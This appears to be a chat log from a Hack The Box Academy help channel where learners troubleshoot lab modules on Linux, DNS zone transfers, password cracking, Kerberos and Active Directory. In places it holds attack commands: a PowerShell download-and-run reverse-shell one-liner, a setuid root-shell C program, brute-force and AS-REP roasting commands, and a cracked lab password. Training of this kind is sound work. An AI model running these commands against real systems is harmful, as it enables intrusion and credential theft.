#modules
Cracking Passwords with Hashcat
i think the next best route for me to upload a zip to a win machine will be to use webdav however the write for it in HTB is really confusing for me
the module would have taught smb transfers, which will be appropriate for windows, http also works
desktop is spelled wrong. and that will only work if your current dir has the desktop folder in it.
i guess this is only a useful comment if you copy/pasted..
hope you figure it out!
it wasnt a copy/paste just a typo here
oh! @dire abyss for some reason i could never get scp to work from powershell.. in the instances ive had to use it on a windows OS .. ive always had to pop open an admin CMD prompt
i think im making it harder than it really is
try cmd
i was an admin for a 200k host enterprise . moving files from test machines to linux servers using scp ... cmd worked ... PS didnt
idk why
(P)iece of (S)hit
Hah
im sure the problem with SCP here is that port 22 is closed and openssh isnt active on the machine
nah
Well, that'll do it
ive used 21 and 23 before with scp
Openssh isn't running
ahh ... openssh ..
yeah
yeah
Is the other key part of that phrase LMAO
i literally quick scanned " im sure ... problem ... port 22..."
this one is pure pain for me lol
i believe it!
We're hackers, we can't r34d
yeah like was said earlier. you cant have a tool magically work if the service it uses isnt running
But try other file transfer methods
thats computers 101
whys my vmware machine have no internet
because thats cheating lol
huh
the network connection was working up until today?
i need internet to connect to htb?
oh nvm i thought you were talking about the module i was on
How would I find the name of a hidden file within directory. Tried -ls, -ls -la
ls -la
You might be able to pipe it to less
What question and module are you working on?
What is the name of the hidden "history" file in the htb-user's home directory?
What is the index number of the "sudoers" file in the "/etc" directory?
Step1: make sure you're ssh into the target
Also with ls you can specify a file with ls
I tried -ls /history
I first tried
cd /home/htb-student
You don't need to specify anything if you're in the home (~)
oh
ls -la from the htb-student home directory will give you the answer
For the second question "index" is the keyword- man ls and look for "index" and use that flag
ls [flag] /etc/sudoers
cant get the first one lol
Then let me ask you: are you connected to the target 10.129.x.x
I get
.
..
bash_history
bash_logout
Bashrc
cache
gnupg
profile
Hmm one of those looks correct
youre looking for the history file
The . in filesystems indicates that it's "hidden"
ls -a
will reveal hidden files
maybe its a?
i use ll alias so i forget .. but essentially ls -lah will give you all good infos
h stands for human readable
but the ls sudoers /etc just shows a large list of files
Wrong order
ls /etc/sudoers
But that's not gonna give you the answer
You need a tag with it to tell you the index
Time to rtfm man ls
ls <path> <path> <path> <path> ls can list multiple paths
man is a linux command that opens a "manual" for a command
like a ls cat?
I got bored one day and did ls /*/*
List all the things
-R is one of my fav ls flags.
nothing in the list talks about "index"
Read carefully
ll -R /home/ | grep <for what ever you think you are looking for>
One of the flags lists the index number
It's in /etc/ not home
--inode?
Try it and see
sorry! I may be detracting from the learning occurring .. im just being social
in a nerdy way
There's also a shorthand
man ls Documentation is a beautiful thing
Rtfm in action is beautiful
ls --inode /etc/sudoers/
Not a directory
Don't add the / at the end
ahhh
theres no sub directories within the sudoers file
A / tells ls that you're continuing the directory chain
Thank you, I suppose I will use the "man" command more often, sorry about this simple question. I appreciate the time to help me!
It's alright
As you can see we were guiding you to get the answer yourself
Not just "here's the answer, don't ask how I figured it out"
Leading a horse to water methodology... or maybe teach a man to fish
And I appreciate that, It makes me still think, and figure it out. Teaching me rather than just telling me the answer and moving on. I love the support!
When in doubt man It out
now ... what to do when a man page doesnt exist ...
no manual entry for this command

--help me
Definitely, I am also taking notes with a software called "Notion" trying to write down anything I am missing or might want to know later
I prefer obsidian
Note taking is so very important
It uses markdown, and you can backlink documents to each other
I looked at obsidian .. I am just using Gitlab
You can link obsidian to git
I actually like obsidian
Heres my note taking script ...
might as well transfer now rather than later lol
#!/bin/bash
DATE=$(date +"%F")
# auto update git at every invocation
target_directory="/home/_rivace/Documents/vscode/Internal/"
original_directory=$(pwd)
cd "$target_directory" || exit
current_timestamp=$(date +"%H:%M")
commit_message="latest commit on timestamp ${current_timestamp}"
git add .
# pass the variable, not the literal string "commit_message"
git commit -m "$commit_message"
git push
# open (or create) today's note page
code "/home/_rivace/Documents/vscode/Internal/Stardate/Stardate-$DATE.md"
cd "$original_directory" || exit
I wouldn't advise that: obsidian is notoriously sharp 
best part .. is you can invoke it from anywhere ..
:^)
and it auto pops a current date page for you to start fresh each turn of the date
invoking a second time same day just " saves progress"
I'd love to see your code projects if that's how you do notes
afaik .. only works if committing as main
Documentation must be smooth
working on it.. im a hard-starter ..
I need to commit my python projects from automate the boring stuff there
i usually am more motivated to code when i have a problem to solve ..
Anyone have tips of how to stay consistent at jumping on HTB everyday and learning more and more?
in that case i needed a "journal "
and .. thus the stardate note script was born
It's definitely a lot about drive. How excited are you to (likely) be frustrated by learning something new
I love fucking up while I learn
hahah
If I fuck up while learning, less likely to do it outside that context
I really want to learn more and know more about everything to do with tech. Sometimes I feel "Burnt out" after working 55 hours a week and then full time school on top of that
i think that might be what im missing ...
ill think about a problem .. and think about it .. and iterate in my head ( mental space ) ... and i find it hard to execute until i identify the path to a possible success ...
But I really want to become the best I can and do more than just the average person
55 hr work + school (I'm assuming at least 20 hours a week or about that) leaves little for yourself
The less you compare yourself to others, the better you can focus on yourself.
I like to do a little comparison as a motivation to push further
Be willing to fail. Someone else has fucked up on the same step you have
I agree, Thats why I just try to keep going without comparing myself to others. Because the more time you spend comparing yourself, the more you lose focus on what really you want
Compare yourself to how you were a year ago, do that once a month and by next year - you can laugh about not knowing the basics yet
Thank you again for everything I appreciate it all. I guess now onto the next challenge!
never ending challenges ... higher and higher steps to climb!
Be willing as well to re-prioritize things
Shmoney and education are important
So taking a day or two off to focus on the priorities lets the back of your mind soak in stuff you just learned
Also tbh learning how to learn is hard
Especially if you grew up in an education system that penalized asking questions (America)
Or questioning the authority to understand more
Also be willing to accept "yep, it really is that dumb"
A lot of the people apologizing about asking questions never had a chance to properly voice their confusion
Also something that's a big thing is writing notes in a way that you understand
If you have to reword it in a dumb way to help you understand then who cares
When I take notes, I read the description of something and rewrite it to where I can fully understand what it does, rather than copy and paste what the page or book says
That's good
Hell the first time I learned to utilize ls I broke it down as "list stuff"
But I'm also fairly decent at breaking down knowledge to the little details to expand on
Thats good
I could be entirely quiet in this channel and just go through content and only ask for help. (And that's fine) but the major reason I contribute here, is to reinforce and expand my knowledge
teaching help solidify it for yourself
Even if it's a module I haven't done yet, and I only know some bits from what I know
i moonlight as a bootcamp instructor for cybersecurity
Like a lot of web stuff I know sweet F.A. about
Lol
Thats what I hope to do too once I get a bigger understanding of it all. That is what I do in my college Cyber Club. When we do CTF. I am one of the few people that understand a lot of it. So I teach and that honestly helps with what I learned because sometimes someone else has an easier way than the way I did it
Mhm
I also have learned how to reword my explanations
I will throw in the occasional "skill issue" here or there, but it's mostly playful jabs
You just have to have patience, not just with the tools - but with yourself. Haste makes waste, waste makes frustration
"I swear I tried 'x' method and it didn't work"
Yeah, Sometimes I step away for a minute, come back and retry with a refreshed mind
Literally me most of the time
The only time I'm really aggressive about it is when someone is being pedantic when it doesn't matter
Like 99% of the userbase calls it this, so we treat it/generally refer to as this
A lot of common convention is convenience
Yeah True
Why is http(s) 80(443)? Who the fuck knows at this point: everyone uses it now
Just used that man command lol. Helped me out to figure out how to sort the files as last modified
Golden star please
some do!! I work for the MIT brainchild .. EdX
It's super useful until it isn't
For now I am glad its helpful
guys where do i ask for linux support
haven't heard of that one yet. Bootcamps are very frequently just a meme with horror stories of people shelling out 16k not knowing nmap getting no certs and employers laughing at them
Like generic linux support? You might have luck in #1024429874246590575
My buddy at work is doing cybersecurity bootcamps and he doesn't even know how a switch works or VLANS lol
Some OS have their own discord and forums
Eh you don't necessarily need to know those things
True but that was the easiest way of me explaining the level of how tech savvy he is. I know Cyber is not just a Switch. I just didn't have an example on top of my head
It's also very wiiiiide
I vaguely know how a switch works conceptually
this one is a 3rd party facilitator partnering with and getting curriculum approval through Universities such as Arizona State University, and Uni. So. Cal.
Anyone familiar with the MSSQL page of footprinting? Having trouble finding the hostname using nmap
Hey can anyone help me with the password attack hard lab ... I just need a nudge about what word list to use at this point I used up rockyou.txt mut_pass.list made from custom rule and also password.list given in resources for the user johanna for initial foothold
is he in the middle of the cohort? learning occurs at different paces depending on the person. maybe ask him again after the cohort ends
OSI model is a big emphasis with the better bootcamps.
Will do!
I think I am missing something but not sure
What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
I typed - find / -type f -name *.conf -size -28k -size +25k -newermt 2020-03-03
-size is weird
In general
hmmm
would the locate command be better for this?
whats your output?
No, find is fine
i know you can sort by file size... id do that and just eyeball it .. but i like to make it difficult for myself
many lines saying "access denied"
ahh
2>/dev/null
There is a section that goes over it
Anyone know why my nmap scripts are all reporting errors?
yeah but i js checked and 2>/dev/null is in the module and its good for him to learn how to find solutions himself
Thats what I was missing at the end
Everything else was right
Trying to run --script ms-sql-info but I'm getting "ERROR: Script execution failed", anyone have any thoughts?
The script failed to execute.
Except that, and I didnt add that since it didn't really explain it in this section, it stated will be learning more about what this done in the future
Yeah a lot of the sections in linux Fundamentals are out of order
2>/dev/null This is a STDERR redirection to the 'null device', which we will come back to in the next section. This redirection ensures that no errors are displayed in the terminal. This redirection must not be an option of the 'find' command.
thats in the module though
Or at least not as clear as they could be
It might be in a later section is the point lol
guess I just read it wrong
It might not be in a section they've already done
yeaahh but it says that it ensures no errors are in output
thats the section with the question he asked
Ahhh ok
i opened it jn
2 is the number for errors, the rest just redirects it to a place that basically gets rid of it
You can actually output it to a file like error.txt and it'll do just the same
thats all he needs to understand rn
sorry marcie i know u understand more than me
refreshing my memory is all
Nah you're good
exit codes yea?
should i just make a new vm for the internet issue?
Nah just standard terminal stuff
ah ok
I've been doing this question and realized I was in the wrong directory the whole time lol
the small things sometimes

When you :q! Instead of :wq
@fathom pendant any thoughts on issue I'm having with MSSQL enumeration? You were able to help me yesterday (which I forgot to thank you cause I was cranky, thank you again)
if you ever need help with the linux fundamentals section, im a bit ahead of you in it so you can ping me if you'd like
What module?
I'm in Footprinting on the MSSQL page
b-b-b-b-bu-bu-but ... thats what i do every time... What do you mean you dont want to be warned you're about to do something stupid...
I dont recall having too many issues with it
So I am doing the full path of the xxd binary, I know this is not the right command but I am not sure what the extension would be for a file like that.
find / -type f -name *xxd 2>/dev/null
I'm running the nmap command but I'm get errors when I run the scripts
Could be a version issue or something ik some versions Nmap scripts borked
Use GET request '/index.php?id=0' to search for the name of the user with id number 1?
-sC ?
How would I approach this where would I put the Get request?
-name xxd iirc
be in a REST API env in the server
no *.
?
ftp is a common one
so find / -type f -name xxd iirc 2>/dev/null
Get request ip/index.php?id=1
if it doesnt work do -name "xxd"
GET request 'IP/index.php?id=0' So something like this in the browser URL?
How does it show you in the section?
Use GET request '/index.php?id=0' to search for the name of the user with id number 1?
This is the question
I have the target ip
I tried something different
I did
"which xxd"
that will give you the bin or sbin where the binaries of the package are located
did it work?
it did
good job !!
Thank you!
Well the section should at least demonstrate what it wants or a previous section
I'm on module/75/section/762
Module numbers mean nothing to me
I figured it out xD
I did this and it worked gave me the answer
That sounds right at least for a standard web request
Those are generally get
Before asking "is it x", you should try it
That way you can say "I tried x and that didn't work"
is it ok to run rm -rf /
That's by far the most overused thing
help I can't boot I have to type this on my phone.
Skill issue
@fathom pendant can you help me with #modules message
Should be able to with mut_passwords you might need to add --local-auth
Or whatever it is in hydra/cme
then why did you yesterday showed me the way towards generic wordlist ??
memory on exact details is fuzzy my guy ¯\_(ツ)_/¯
I haven't touched it in ages
This whole HTB thing is a lot more structured than TryHackMe...
Seems a bit more professional too
I agree
That's kinda the point
The authors are well known people in the field that have broken them down in a structured way
On the gold annual subscription blog post by HTB
One exam voucher, worth $318 if purchased separately and providing two attempts.
Does this mean that's the price for the new voucher. Or does it mean that vouchers are going up in price?
If they're going up I'd want to buy them before that
Yeah, I did wonder about that. Since it's their first advanced certification and the previous three were considered intermediate. That would only be the price for the CWEE voucher is my guess.
Imagine getting gold annual for the lower level certs lol.
morning!
what is the CWEE?
Hi. Can anyone help me with a doubt in the privesc part of the Getting Started module?
sure thing
DM?
I got read access to the ssh key but I couldn't understand how since the permissions show root:root for id_rsa. Is it because of the other part of permissions?
Well yes, root:root just means the owner of the file, if you look at the permission bits, it has 3 'r' meaning that anyone in the system can read that file.
Got it. Just needed that confirmation haha
remember owner-group-others
rwx-rwx-rwx
sometimes I want those easy permissions on Windows
im working with InTune and its so fkn difficult
@slender shoal RBAC with InTune is not easy !
Very afraid of touching windows haha. Really hate that it is not as transparent to understand
Yes, but it has its advantages. You have way better granular control. And after that Windows is the king of Enterprise environments so it is what it is haha
necessary evil
There will be a senior advanced web cert after ? I Ask because it miss openID in the oauth section, or the csrf... And an intro to nosql for a senior web pentester xD
UNDERSTANDING LOG SOURCES & INVESTIGATING WITH SPLUNK
Introduction to Splunk & SPL
https://academy.hackthebox.com/module/218/section/2356
Question 3:
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.
I got the correct answer, but I'm not really understanding what I'm missing here. I see that the hint mentions ||to use the "range() function"|| However, I'm not getting the correct results. My answer still shows the wrong user with the number of login attempts within the span of 10 minutes. I think my issue is that I'm not using the ||range|| function, but I'm not really tracking on how to use it.
anyone has done this ? I think i am in the right track but it is not working.
EDIT: solved, i hate when some attacks take so long
https://academy.hackthebox.com/module/147/section/1323
How am I supposed to gain access to this
I have the password from the previous but is there something I am missing?
Are we supposed to log into it via ssh or some other protocol
ayo anyone done with password attack module am kind a stuck in Credential Hunting in Windows
Tbh I'm not a fan of that question or I don't understand it myself. From the solution with range() that I have seen the only reason you can see the correct answer is because it is the only account where the first and last recorded login are within 10m, so you can filter all the other ones out by that criterion
the first question is idk i cant find the ssh pass when i did findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml there are ell alotta files containing pass
so any idea how to find this pass ?
Right, I just dont quite understand that function and how its used. I was also reading the splunk docs and see what it does but I dont understand how to use it.
yes iirc or ftp
ig i exploited it with somthingblue
there's a couple different things you CAN try
DM me?
i used lazagne.exe all BUT THE creds i got was non but just shit i got some hashes which i tried to crack em with hashcat and still all shit non was there and the wordlist i used was rockyou
Range really is just the max value minus the min value of an aggregated group
Right.
any idea ?
instead of just asking do
i don't recall how i did it
i don't recall it being that difficult
i just kinda mostly did what the section showed
it is not tbh
sorry i thought you were the person asking something else
np
idk i think am missing smth and it sucks
that things you CAN try was aimed at the person asking about logging in with kira
idk man i haven't done this module in a minute so can't help ya too much
like I said it wasn't particularly hard i think i just looked around and found something
ok
idk what format it expects
Dont post spoilers.
now
Hey guys any tips regarding file transfer module " Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer."
maybe host a python webserver
edit: i think to download "FROM" pwnbox, you can just use wget url to download
i think i know the url but it doesnt accept it
i did all other ones and got revshell
Whats the module and section
attacking common applications skills assessment 2
You can DM me.
Hey there. I am very stuck on a module. The rest is fine, but the dns one is killing me. I am stuck on the following question: Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
This is the module Attacking Common Services | DNS
anyone that could give me a hand here?
dig for ever
i understand that. But i cant seem to get it
look for subdomains that have their record as 127.0.0.1 and then dig again
hint: you need to axfr transfer from one of the servers
you can still query doing dig axfr subdomain.inlanefreight.htb @ip
└─$ dig ns @10.129.148.222 inlanefreight.htb
; <<>> DiG 9.19.17-2~kali1-Kali <<>> ns @10.129.148.222 inlanefreight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43430
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: 3d0b0db70d6abfac010000006583ec252832d4d4a79ade84 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN NS
;; ANSWER SECTION:
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
;; Query time: 104 msec
;; SERVER: 10.129.148.222#53(10.129.148.222) (UDP)
;; WHEN: Thu Dec 21 02:41:24 EST 2023
;; MSG SIZE rcvd: 107
this right?
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
axfr
no
bruteforce using subbrute then you will find something
i specifically said axfr for a reason
nah subbrute isn't needed for this question
idk thats how i did it
okay
yes, but i've tried axfr on all the subdomains i've found using subbrute and it shows the same response
└─$ dig axfr @10.129.148.222 inlanefreight.htb
; <<>> DiG 9.19.17-2~kali1-Kali <<>> axfr @10.129.148.222 inlanefreight.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.
bruh
even the hint points at it
can i dm? i dont want to post the subdomains i've found related to a module
no
once you find the subdomains it lists all you need to do is dig txt subdomain.inlanefreight.htb @ip iirc (you might need to do axfr)
dm me if you are still stuck after trying
tried so far all the subdomains i found with the following dig command: dig txt inlanefreight.htb @10.129.148.222
I dont really see anything interesting that is in the output.
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: cf63705f9e5069fc010000006583efb2bd92ce9a8505a86f (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN TXT
;; AUTHORITY SECTION:
inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
;; Query time: 95 msec
;; SERVER: 10.129.148.222#53(10.129.148.222) (UDP)
;; WHEN: Thu Dec 21 02:56:34 EST 2023
;; MSG SIZE rcvd: 115
ftp is empty entirely
try listing all
ls -R and ls -a both tried
weird
ssh also works
@quasi jungle
:P
use subbrute
are you digging the subdomain.inlanefreight.htb?
you do need to specify subdomain
otherwise all you've done is just query inlanefreight.htb a bunch
and not changing anything
i.e. www. or internal. or dev.
(note that may not be the actual subdomain for the answer, just an example)
Hey @fathom pendant I am just curious, do you plan on ever getting any of the certs?
life taking prio rn
gotta get that back on track prior to anything else atm
ah ok
hi, anyone here done the password attacks module?
yes i have. i just didnt include it here for spoilers reasons
tried all the subdomains i found
then you missed one iirc it's two letters
the resolver is correct right? The one i am using on subbrute? ns.inlanefreight.htb
hi I need help. I have been stuck in this for over a week. I'm doing the LINUX PRIVILEGE ESCALATION Logrotate. Everywhere i look it says that im supposed to use the ./logrotten to rotate it but it says that i dont have logrotten on the machine and i cant clone it from github without sudo so i can really do anything here help!
resolver should be the IP
i have a small question about the linux credentials hunting in the password attacks module
the hint is wayyyy too far from the subject
like it feels undoable without the hint or requires A LOT of brute forcing
since by this point you should realize the linux boxes are all the same you can do some enumeration on the previous exercise to limit your users to those in /home/
well that
i think this make sense
he's referring to the fact that the user in question that you get the info with is unknown without a nudge
but not much
the linux boxes are all connected/the same in the password attacks module
yeah when i went to the /home directory i was like " i saw these names before"
but i wasnt convinced that why would they place the SAME box
because ease of learning
yeah i see that now, thanks
(you should save kira's pw btw)
i save all passwords i get
also did
the only ones that aren't linked (obviously) are the skill assessment labs
yeah i did think of that for some reason
yeah make sense
thanks for the help
it would lead to increased frustration if they made all the labs in the module completely different
when the purpose is to showcase password attacks and cracking
patience
¯\_(ツ)_/¯
nice scam bro
<@&861185840277487616>
hi I need help. I have been stuck in this for over a week. I'm doing the LINUX PRIVILEGE ESCALATION Logrotate. Everywhere i look it says that im supposed to use the ./logrotten to rotate it but it says that i dont have logrotten on the machine and i cant clone it from github without sudo so i can really do anything here help!
well the other problem you're gonna have is the fact that the target machines don't have internet access
step 1: download logrotten to your attack machine
step 2: transfer to target system
Module name Password attacks
Section name :Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio im getting this error after exporting and running klist command : klist: No credentials cache found (filename: /root/krb5cc_647401106_yFQuNx)
Trying to crack a hash for a zip file but john shows 0g but it isn't the correct password
why are you looking in /root/ ?
that output from john shows that it's exhausted
try using the mutated wordlist
i copied to root or else it might get expired right? in /tmp
unnecessary
there's 2 ccache files for the user; one IS expired the other ISN'T
just because you change the directory it's in doesn't change it's expiration: that's on a different thing
I just realized this, but how do I transfer to the target?
refer back to the File Transfer module
oh okay thanks
i thought the resolver was the ns record
technically yes: but subbrute doesn't know that
thank you!
as .htb isn't a valid tld
it's not on any public DNS servers for it to query and ask
is there a way to check if zone transfers is possible? When not specifying the axfr in dig?
i mean what you can do instead of using subbrute is take the names list and do a for loop
that iterates through each until you get the right response
but THAT is a pain in the ass
:)
i dont know what this error means : gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER
i exported ccache and i verified it using klist now when i try to access dc01 using smbclient i get this
nt status invalid parameter - means that one of the things in the token is bad
¯\_(ツ)_/¯
oops
googling seems to result in it's a version issue maybe
try specifying the smb version?
nah the ticket expired thats the issue thanks anyways i sort it out
<@&861185840277487616>
hi im doing the LINUX PRIVILEGE ESCALATION Logrotate still and i have transferred logrotten to the machine. but when i create the payload and then just echo something in the access.log i create a new one ofc but when i add the payload i dont get the ncat connection back i dont get it
help
root@linux01:/home#|| kinit linux01@INLANEFREIGHT.HTB -k -t /var/lib/sss/db/ccache_INLANEFREIGHT.HTB||
kinit: Pre-authentication failed: Unsupported key table format version number while getting initial credentials. can i get any hint on this ?
Has anyone done the Enterprise Network module in the last while? I'm trying to Escalate my Privileges the exact same way as the section says but I never get the shell on the netcat listener running on MS01.
i found the flag.
Module name: PASSWORD ATTACKS
Section: Attacking LSASS
Question: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)
I found the right password hash, but I can't decrypt it, I used all the dictionaries I had (sorry for the mistakes in the text, I used a translator).
might want to use rockyou for that, your wordlist seems quite short
I've already used it, it didn't work.
just use the resources password.list - perform mutation on it with custom rules
oh wait it's password attacks, yes use the mutated list
I tried that one, too.
yep 94k list
you sure?
I'll check again.
the hash is right, the mutated list should do it
doesn't work
then hash might be wrong
no the hash is right, but the pass is not in the mutated list
ah okay use rockyou + onerule
Can anyone assist with the SysAx PrivEsc in Attacking Enterprise Networks, I can't get it to work
follow the steps in the exploit db entry, that's all you need
And that is what I did, the task is just never triggered
In Password Attacks Lab - Hard
i got johanna password for rdp then i found keepass i cracked it:||Qwerty7!|| but i cannot login through smbclient as dxxxx
i checked md5hash after and before encode and copying login.kdbx
Would you be willing to look at what I am doing?
i think you are speaking about another exercise
I really don't have more information than what's in the exploit db entry, if you follow the steps you should get it
its just that it seems like the task is never executed, like no log is even created
Module: Attack Common Apps Section:Wordpress Discovery --- Cant get the exploit working :WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution -- actually managed to do it manually but also want to use this exploit -- can someone help me to get if work?
Actually managed it. Had some typos in the exploit -- doesnt the exploits published on exploit-db get reviewed? -- just wondering?
Can just anybody upload an exploit?
Module: Password Attacks Section: Password Mutations
I have been trying the bruteforce task for the sam users password. I've followed the instructions using the password.list file and the custom.rule included and the best64.rule which is part of hashcat. I have cut the password files down to 1k each and modified them so they only contain passwords 8-10 characters long but nothing seems to work.
It was also suggested to use ftp as its quicker than ssh for the bf but that has not returned any positive result either.
Is anyone able to please give me some guidance how to solve this?
I succed for receive my access but it is not for succeed identifier login in the page login.php
@dreamy solar Did you receive creds from phishing link?
Maybe you xss payload is not correct for phishing?
Managed to solve it with an xss polyglot from payload all the things and adapted it accordingly
I don't understand am I supposed to wait? I retrieved the identifiers, I followed the course tutorial, everything is correct, I don't see where it's blocking
When are user IDs supposed to be displayed?
the simple payload is succeed it is just this that not okay and 0 informations
I compared it with a person who had successfully completed the exercise, strangely nothing changed in my approach.
why are you sure your payload is correct - guess if it would be you would get the creds
because my colleague has the same as me and it works ^^"
So your php file must be correct, otherwise you wouldnt get your own creds
Yes
yes
managed to solve it with following polyglot:
I learn what is a Polyglot xss ? plz
dont know exactly but some kind of tricking the application in multiple ways executing for example js
or in terms of programming a payload which can be interpreted by multiple languages at the same time
but im not sure if its supposed to be solved this way -- nevertheless it worked
oki thanks I test
Hi im on the module linux privilege escalation and i am on Miscellaneous Techniques. I succeed with transferring it and giving the shell.c the right uid but when i execute it i dont become root. i wrote this in the shell.c "#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}"
it also says "-rwsr-xr-x 1 backupsvc logger 20184 Dec 21 15:41 shell"
in module: broken authentication predictable reset token question1, can someone give me a nudge, look at my code? OMG nevermind i got it...tnx for not answering me yet lol
Im in attacking common services module -> attacking ftp section, on the second question of the exercise here. ||I connected anonymously to the ftp, got the pass and user list and try to brute force it using medusa. It has 11 potential users and 250 passwords. It is taking ages to brute force it, because the ftp has some login lag (even though I'm trying from pwnbox). The command I run: medusa -h $IP -U users.list -P passwords.list -M ftp -n2121|| Is there any way to speed it up?
I am working on the ad enumeration skill assessment 1 - i uploaded rubeus to the webshell, but how can i run it if i cannot cd to that directory? I am trying to get the password for the ||svc_sql|| user
I am trying to run this ||.\Rubeus.exe asreproast /user:svc_sql /nowrap /format:hashcat||
if you're using hydra, set the number of threads -t 48
why can you not cd? anyways you can specify absolute path
I bruteforced the second question of which user is available because it only had 11 options, then used this user in hydra to bruteforce the ssh login. It would take hours with medusa and hydra
if the section is about ftp shouldn't you brute ftp
Hello, I would like to know if i do something wrong because should i see the flag.
introduction windows command line - Skills assessment
@next bronze I tried to cd in the web here /uploads/antak.aspx, but it just stays in current directory
use absolute path
looks like the file is empty, are you sure that's the right file?
@next bronze this is the name of the file 0 flag.txt
if the file is empty then it's probably elsewhere
Module: AD enumeration & attacks, Section: Skills Assessment Part 2
I got a revshell on SQL01 as nt service\mssql$sqlexpress, but I don't know where to look for PE to the Administrator account.
Is anyone able to please give me some guidance on how to proceed ?
@next bronze Ok
try cat flag.txt
@sharp nexus 'cat' is not recognized as an internal or external command,
operable program or batch file.
rip
of course, that's the command prompt, not powershell, cat and ls don't work there
you right you right
Exact
forgor
you probably have to search for the flag in some way
type flag.txt ?
which question
Q7
did you try whoami /priv? it's a service account
for Broken Authentication "Using rockyou-50.txt as password wordlist and htbuser as the username, find the policy and filter out strings that don't respect it. What is the valid password for the htbuser account?" can someone DM me and give some sort of hint? Ive have been going back and forth with the policy and character classes for about 2 days now and nothing is hitting.
So i am trying to still figure out how to get rubeus to run if it gets upload to this spot...trying to get Q3 for the skills assessment of ad enumeration
you can find where it's uploaded then use absolute path, but I advise to upgrade to a better shell to make your life easier, webshells suck
Hi im on the module linux privilege escalation and i am on Miscellaneous Techniques. I succeed with transferring it and giving the shell.c the right uid but when i execute it i dont become root. i wrote this in the shell.c "#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}"
it also says "-rwsr-xr-x 1 backupsvc logger 20184 Dec 21 15:41 shell"
Hey man, could you give us a hint! @supple gorge
@old atlas are you asking how to transfer files?
Use SCP... It explains in the following sections
Http-uri is close to the answer. Search up http keywords you can use
tyvm this was the way to go
anyone can help me with Web Attacks - Skills Assessment?
i can't execute xxe
Can someone give me a hand with getting a better webshell or executing an exe after uploading for the skill assessment 1 under ad enumeration?
i got it
CPTS path reporting template contains appendix "Exploited Hosts". Should it only include initial access? Or privilege escalation too? For example, draft example specifies MS01 2 times
Read the notes part: aside from that no one can answer that for you that's done the exam
"Alternate domain foothold"
Which indicates multiple levels of compromise not just the way initially accessed by the tester
This is also better to ask over in #cpts
hello y'all, anyone who can lemme know what can be wrong in this vHost fuzzing command : ffuf -t 250 -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://gitlab.inlanefreight.local:Port/ -H 'Host: FUZZ.gitlab.inlanefreight.local'..?
The draft is from reporting module, so I thought it should be asked here
Your question was more general towards the exam
It didn't sound like it was from a module
I'm asking cuz I'm stuck trying to fuzzing/enumerating the vHost in the skill assessment II from attack common app
I was mostly confused as to why the draft has specified the same host (MS01) 2 times
I am running this command ||powershell.exe -nop -ep bypass -c "iex ((New-Object Net.WebClient).DownloadString('http://10.10.14.212:4444/Invoke-PowerShellTcp.ps1'));Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.212 -Port 4444"|| and also this one ||powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.212:4444/powercat.ps1');powercat -c 10.10.14.212 -p 4444 -e cmd"|| with nc -nvlp 4444 on my attacking machine. I get a connection and it says the following:
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.202.242.
Ncat: Connection from 10.129.202.242:61815.
GET /Invoke-PowerShellTcp.ps1 HTTP/1.1
Host: 10.10.14.212:4444
Connection: Keep-Alive
But as soon as I type something - it ends it - anyone have any advice how i can keep it in order to get a better shell for ad enumeration skill assessment 1?
check back on what's the correct syntax for ffuf, gitlab is already a vhost
If you read the notes column it's pretty self explanatory
Okay, thanks
hmm I think I got ur point
you've done shells & payload? you can't use the same port for both the listener and hosting the .ps1
@next bronze - totally forgot that tbh
been bouncing between a few things and should've thought of that...thank you - totally appreciate it
I think I'm a little paranoid. I've been told many times that if I just use a vpn, avoid talking about personal details, and then use tor primarily, that my opsec is really secure, but I've always felt that even vpns are hackable because I grew up in the mindset that if it's connected to the internet it's hackable.
Vpns only mask traffic
Module: Password Attacks Section: Password Mutations
I have been trying the bruteforce task for the sam users password. I've followed the instructions using the password.list file and the custom.rule included and the best64.rule which is part of hashcat. I have cut the password files down to 1k each and modified them so they only contain passwords 8-10 characters long but nothing seems to work.
It was also suggested to use ftp as its quicker than ssh for the bf but that has not returned any positive result either.
Is anyone able to please give me a nudge on how to solve this?
Like say I was doing nation sate acting for instance, I feel like it'd be much harder than just that to prevent a government or even a bad actor from hacking ya
